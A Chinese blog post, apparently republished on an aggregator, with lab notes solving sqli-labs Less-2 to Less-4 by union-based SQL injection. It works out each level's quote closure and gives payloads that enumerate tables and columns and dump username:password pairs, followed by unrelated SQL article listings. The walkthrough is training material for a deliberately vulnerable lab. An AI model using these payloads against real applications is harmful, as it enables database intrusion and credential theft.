Sqli-labs靶场笔记2（Less-2~4 联合注入）

2023-11-19

sqli-labs的Less2到Less4三道题都可以用联合注入解决，所以放到一起来记录，联合注入的基本思路方法可以看我的上一篇博客，这里只针对题目来写。

Less2

还是跟Less1一样，想要夹带私货，就得要先想办法闭合，我们先输入单引号看一下
在这里插入图片描述发现连我们写的数字1都没有显示出来，这种情况我们就可以推测后端接收的是一个数字型的，可以直接不用闭合（我个人理解的是后端接收数字型，所以我们写1’直接显示不出来）所以直接先测测数据库（报错位就不测试了，跟Less1是一样的）
在这里插入图片描述然后就开始测试表名列表并且获取用户数据，语句和结果分别如下
爆表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

在这里插入图片描述爆列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"--+

在这里插入图片描述爆数据

?id=-1 union select 1,2,group_concat(username,':',password) from users--+

在这里插入图片描述

Less3

照样是先测测闭合，发现是’)闭合，直接开始爆库名

?id=-1') union select 1,2,database() --+

在这里插入图片描述
爆表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

在这里插入图片描述
爆列名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"--+

在这里插入图片描述
爆数据

?id=-1') union select 1,2,group_concat(username,':',password) from users--+

在这里插入图片描述 # Less4
这一关也是先看看闭合方式
通过报错信息我们能猜测闭合方式是")，直接爆库名试试

?id=-1") union select  1,2,database() --+

在这里插入图片描述然后爆表名

?id=-1") union select  1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

在这里插入图片描述
然后爆列名

?id=-1") union select  1,2,group_concat(column_name) from information_schema.columns where table_schema="security"  and table_name="users"--+

在这里插入图片描述最后来爆数据

?id=-1") union select  1,2,group_concat(username,':',password) from users--+

在这里插入图片描述

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

靶场笔记

数据库

sql

网络安全

安全

Sqli-labs靶场笔记2（Less-2~4 联合注入）的相关文章

是否可以使用“WHERE”子句来选择SQL语句中的所有记录？

晚上好我很好奇是否可以在 SQL 语句中创建一个 WHERE 子句来显示所有记录下面一些解释随机 SQL 语句 Java JSP示例正常情况 String SqlStatement SELECT FROM table example
SQL 大表中的随机行（使用 where 子句）

我有一个网站人们可以在其中对汽车进行投票向用户展示 4 辆汽车他她可以投票选出他们最喜欢的汽车桌子cars有重要的列 car id int 10 not auto increment so has gaps views int 7
是否允许在流水线 PL/SQL 表函数中使用 SELECT？

管道函数的文档指出在 SQL 语句通常是SELECT 并且在大多数示例中管道函数用于数据生成或转换接受客户作为参数但不发出任何 DML 语句现在从技术上讲可以使用 SELECT 而不会出现 Oracle 中的任何错误 ORA
如何通过循环变量在 dbt 中多次运行 SQL 模型？

我有一个 dbt 模型测试模型接受地理变量 zip state region 在配置中我想通过循环变量来运行模型三次每次使用不同的变量运行它问题是我有一个如下所示的宏它将变量附加到输出表名称的末尾即运行测试模型 with z
SQL Group BY，每个组的前 N 个项目

我有一个 SQL 查询可以获取给定商店中销量最高的 5 件商品 SELECT TOP 5 S UPCCode SUM TotalDollarSales FROM Sales S WHERE S StoreId 1 GROUP BY S U
Yii 查询时对相关模型的限制

我遇到了极限问题我正在使用的代码如下 model PostCategory model record model gt with array posts gt array order gt posts createTime DESC li
外键引用多个表

我有4张桌子 A ida name B ida B specific stuff C ida C specific stuff D ida D specific stuff 我希望另一个表 E 可以仅引用 B 或 C 而不是 D 我可以在其
案例陈述以确定我是否应该结合

我目前想做某种条件联合给出以下示例 SELECT age name FROM users UNION SELECT 25 AS age Betty AS name 假设我只想在用户计数 gt 2 时合并第二个语句否则不合并两者总之
INNER JOIN 可用作 SELECT，但不能用作 DELETE [重复]

这个问题在这里已经有答案了为什么这个有语法错误 DELETE FROM print mailing request pmr INNER JOIN person p ON p id pmr person AND p email LIKE T
ORA-01749: 您不能向自己授予/撤销权限

我正在运行以下查询RATOR MONITORING授予引用权限的架构RATOR MONITORING CONFIGURATION SMSC GATEWAY表到RATOR MONITORING schema GRANT REFERENCES
如何在 SQLite 中获取最后插入的 ID？

SQLite 中是否有任何内置函数可以获取最后插入的行 ID 例如在 mysql 中我们有LAST INSERT ID 这种功能对于 sqlite 任何可用于执行相同过程的函数请帮我 Thanks SQLite 这可以使用SQLite
MySQL 中的 UDF 性能

我注意到当查询在 SELECT 或 WHERE 子句中调用 UDF 时 MySQL 查询执行时间的性能会呈指数级下降有问题的 UDF 查询本地表以返回标量值因此它们不仅执行算术表达式而且充当相关子查询我通过简单地删除 UDF 并使
使用 xmlagg 时出现子查询错误和太多值

我在连接许多大型表中的所有数据时遇到问题我昨天对此提出了问题但不幸的是 listagg 似乎不是一个好的选择链接子查询返回多行 https stackoverflow com questions 54651144 subquery r
SQL Server递归查询显示父级路径

我正在使用 SQL Server 语句并有一张表例如 item value parentItem 1 2test 2 2 3test 3 3 4test 4 5 1test 1 6 3test 3 7 2test 2 我想使用 SQL S
ActiveRecord 嵌套 SELECT——我可以在没有手动 SQL 的情况下完成它吗？

我有一张桌子上面有除其他外一个名字和一个等级我想返回所有唯一名称的集合但对于返回的每个名称我想选择排名最高的行这很简单有两个嵌套的 SELECT 语句 SELECT FROM SELECT FROM foo ORDER BY
oracle中的区间函数

Query SELECT INTERVAL 300 month INTERVAL 54 2 year to month INTERVAL 11 12 10 1234567 hour to second FROM DUAL 上述查询的输出是
MySQL：为什么 IN 子句中的第 5 个 ID 会极大地改变查询计划？

给出以下两个查询 Query 1 SELECT log id FROM log WHERE user id IN 188858 188886 189854 203623 204072 and type in 14 15 17 ORDER B
搜索多个表 (SQL)

我需要能够有一个 SQL 查询来使用简单的搜索来搜索我的数据库这是我的表格现在的样子 Table artists id name Table albums id artistID name Table songs id albumID n
当您执行“SELECT *”时，SQL Server 如何确定列的顺序？

当您执行以下操作时 SQL Server 如何确定列的顺序SELECT 我知道订购依据对于订购至关重要data 但我预计列名保持一致注意我的代码是not取决于返回列的实际顺序我只想知道 SQL Server 如何决定对列名进行排序
如何限制mySQL中的搜索和替换字符串

我用它来搜索和替换 mySQL 中的字符串 UPDATE products SET prodname REPLACE prodname S S 这些产品包含诸如 TYLENOL TABS 100 S 之类的字符串我想将其转换为 TYLEN

随机推荐

rabbitmq queue_declare arguments参数注释

说明官方文档在创建queue时可以指定很多参数可以限制队列的大小消息的死信时间优先级等等 queue消息条数限制 x max length 该参数是非负整数值官方文档限制加入queue中消息的条数先进先出原则超过10条后面
JavaScript重写Symbol(Symbol.iterator)实现迭代器（1）

iterator迭代做的跟java集合迭代差不多就行了示例图 h1 对象遍历重写iterator接口1 h1
HTML5无刷新修改URL：利用 History API 无刷新更改地址栏

为什么80 的码农都做不了架构师 gt gt gt HTML5 新增的历史记录 API 可以实现无刷新更改地址栏链接配合 AJAX 可以做到无刷新跳转简单来说假设当前页面为renfei org 那么执行下面的 JavaScript 语
前端权限控制（一）：前端权限管理及动态路由配置方案

权限控制在项目中尤其是在后台管理系统中不同人员登陆看到的页面菜单是不一样的比如一个公司的办公系统超级管理员登陆可以看到所有的页面而普通员工账号登录可能无法看到人员管理等页面比如公司的员工个人资料页面只有人力资源部门有权利看
软件测试面试题：软件测试的风险主要体现在哪里?

软件测试的风险主要体现在哪里我们没有对软件进行完全测试实际就是选择了风险因为缺陷极有可能存在没有进行测试的部分举个例子程序员为了方便在调试程序时会弹出一些提示信息框而这些提示只在某种条件下会弹出碰巧程序发布前这些代码中的一些
【MySQL】MySQL存储过程从一张表查数据插入另一张表

测试表 CREATE TABLE demo test ID varchar 64 NOT NULL name varchar 64 DEFAULT NULL age varchar 64 DEFAULT NULL PRIMARY KEY I
四种常见函数式接口

消费型函数式接口 Consumer
jmeter分布式压测

1 什么是分布式压测由一台控制机 Master 发出命令控制多个压力机 Slaves 执行操作 2 为什么要做分布式压测一台压力机的 Jmeter 默认最大支持 1000 左右的并发用户数线程数再大的话容易造成卡顿无响应等情况
Tomcat安装与配置（详细步骤）

本篇博文记录了Tomcat环境安装与配置的详细步骤旨在为将来再次配置Tomcat时提供指导方法一下载Tomcat Tomcat官网为 https tomcat apache org 1 按照下图根据JDK版本选择对应的 Tomcat
Chromium多进程架构，你知道多少？

一前言国内外主流的浏览器大多采用的是谷歌的Chromium 浏览器内核 Chromium是一个多进程多线程架构的Web引擎很多应用和底层开发者希望了解Chromium中的进程和线程的种类和用途以便能利用相关信息提升应用的性能为此
解决Eclipse，MyEclipse出现An error has occurred,See error log for more details的错误

src http blog sina com cn s blog 4ba5b45e0102eam8 html 现把找到的解决方法整理提供给大家如下方法1 在开始 gt 运行 gt 打入 cmd 进入命令提示行后再进入eclipse的
iOS编程基础-OC（八）-运行时系统的结构（续）

该系列文章系个人读书笔记及总结性内容任何组织和个人不得转载进行商业活动第八章运行时系统的结构 8 1 2 运行时系统库苹果公司提供的OC运行时系统库实现了OC的面向对象特性和动态属性多数情况下运行时系统库是在后台起作用但也拥有
如何使用Vue开发Electron桌面程序

目录一 Electron介绍二项目搭建 1 使用 vue cli 创建vue项目 2 安装插件 vue cli plugin electron builder 编辑三开发总结 1 配置项目图标 2 在Mac系统下的几个问题 3 项
重要的环境变量&通配符&转义字符

重要的环境变量变量是系统用于可变值的数据类型在linux中环境有几百个都是系统运行环境的一些参数例如用户家目录等输入 env 可输出所有环境变量几个比较常见的环境变量 PATH 定义当前用户解释器搜索路径 HOME 当前用户的
Mac os下通过Anaconda在远程服务器配置python虚拟环境

一 SSH管理软件这里推荐一款本人正在使用的软件 Termius Termius是一款非常好用而且漂亮的SSH客户端能快速远程控制服务器可以定制自己喜欢的主题 Termius不仅涵盖了Windows Linux OSX 还变态得支持A
POI及EasyExcel-读写示例

POI
嵌入式杂谈之中断向量表

虽说接触了好久的单片机或者说嵌入式开发不过对于有些概念还是比较模糊因此此系列将会从一些零碎的小知识点出发慢慢的遍历整张嵌入式开发的地图这次先来看一下中断向量表至于为什么会提到中断向量表主要是因为我自己在学习嵌入式Linux开发的
基于51单片机的8x8x8LED光立方设计

1 简介本设计是以STC89C52单片机的8x8x8的LED光立方本设计将LED光立方分成8层分别由单片机的P1 8个IO口来控制每一层由于采用的是共阴极所以当层电位为高电平有效由P0口和P2的总共16个IO口来控制每层的64盏灯
对视频剪辑应用灰度图像变换+Moviepy生成灰度视频处理遇到几个有意思的问题

一引言最近在学习图像处理的直方图处理对直方图均衡处理效果感觉非常有用以前学习Moviepy音视频剪辑时用的卓别林的一个黑白视频片段感觉视频的噪点比较多画面也整体偏暗不禁想看看如果对其进行直方图均衡会怎么样如是开干但进展
Sqli-labs靶场笔记2（Less-2~4 联合注入）

sqli labs的Less2到Less4三道题都可以用联合注入解决所以放到一起来记录联合注入的基本思路方法可以看我的上一篇博客这里只针对题目来写 Less2 还是跟Less1一样想要夹带私货就得要先想办法闭合我们先输入单引号看

热门标签